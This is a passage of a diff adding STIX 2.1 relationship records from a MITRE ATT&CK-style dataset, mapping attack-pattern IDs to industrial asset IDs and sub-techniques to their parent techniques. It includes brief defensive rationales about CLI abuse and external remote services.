"x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a55c3c6-d410-4be6-a92d-c60541e8e6d7", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a593eee-d2de-4f3e-acc0-1819beb55d3e", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a7714b6-4ae9-4ea5-83a0-00595621273b", + "created": "2024-05-22T15:23:00.881Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:23:00.881Z", + "description": "Asset Mapping Rationale: Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. Adversaries can use the network CLI to change how network devices behave and operate.", + "relationship_type": "targets", + "source_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a7f9176-7792-4576-97ca-3e9b6ac9dd8a", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a900ac4-c150-4b57-a899-990854b01d4b", + "created": "2023-09-29T16:33:50.423Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:33:50.423Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a91ae82-db36-45ee-89b4-72c2b32e345f", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a96ad0d-84df-4b6b-ba4c-8559de5ec356", + "created": "2023-09-29T18:57:45.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-23T21:59:34.492Z", + "description": "Asset Mapping Rationale: Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network.", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a9ca148-a456-4b66-805f-a2bdfc7a947d", + "created": "2023-09-28T20:09:21.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:09:21.736Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1a9f17f7-7770-4b45-acd1-029d44c4783c", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1aa97e6c-8ff6-4ead-8094-7a99eb80120a", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1aaca49c-ff16-4551-967d-ae2849fcfeb0", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ad161ad-46be-4b94-a562-d60934877232", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1af12953-edeb-4678-91e4-7c70000ee6c3", + "created": "2020-02-20T22:10:20.630Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1af5c5bb-0d97-4c0a-9174-4dee1ff8b185", + "created": "2023-09-29T18:01:06.725Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:01:06.725Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b033e02-3fb7-4ac0-b0b8-69ba0dada651", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b12ce92-9e2d-481d-a652-56a367e7f4a7", + "created": "2024-06-26T19:25:58.906Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:25:58.906Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b18d27e-052b-48c8-a05a-874d9cdb8bd8", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b21ec7e-4a05-4010-8b50-43231c5e9496", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b3decba-4b52-47ce-8e45-ca1c4f750270", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b47f5bd-0a83-48d6-9816-5eb71fc650fa", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b7c7b5c-22df-4713-be96-818a8916e6d1", + "created": "2020-10-15T02:59:38.710Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b842638-ea53-4bf6-9bc0-c6b9a5fef132", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b8c21b4-b02d-4c23-8ff7-b5b9ddc07f75", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b94c927-0445-4ed8-80f1-7b31418f60b5", + "created": "2023-09-29T17:43:41.332Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:43:41.332Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1b9d2770-3d36-4aab-b284-28ad522b3f07", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ba2e3ad-9a0c-4c5f-ae15-a82005470455", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ba35d6b-e1be-454d-bfa8-353fabdd3432", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ba485c9-951e-4e07-8e69-1d0efc372f6b", + "created": "2023-09-29T16:41:44.745Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:41:44.745Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1bb5509c-060b-44c9-8f3e-388efd713034", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1bccb381-1d71-4c9a-8785-2ada562234f2", + "created": "2020-03-13T20:36:57.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1bdd6fb4-b36e-4644-80ac-2c99e3748e89", + "created": "2024-06-27T09:03:43.370Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:03:43.370Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1bea0610-432c-4cd7-8e0e-8b7bbd09d738", + "created": "2023-09-29T18:00:32.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:00:32.581Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1bfccfab-38ff-4aae-97a4-63bc96c3500e", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c5473fd-42d0-41c4-83fc-c1c74955ead9", + "created": "2024-06-27T09:39:45.685Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:39:45.685Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c5ea799-a22b-4214-860e-fdb9d1fc577c", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c7ab0cb-a3dd-4b0a-8ae1-6519c7957559", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c7ae055-967d-4ea0-a14c-0ca6166d2c4e", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c7df4f1-cee5-42c6-a974-29552552666f", + "created": "2023-09-28T19:47:08.952Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:47:08.952Z", + "description": "", + "relationship_type": 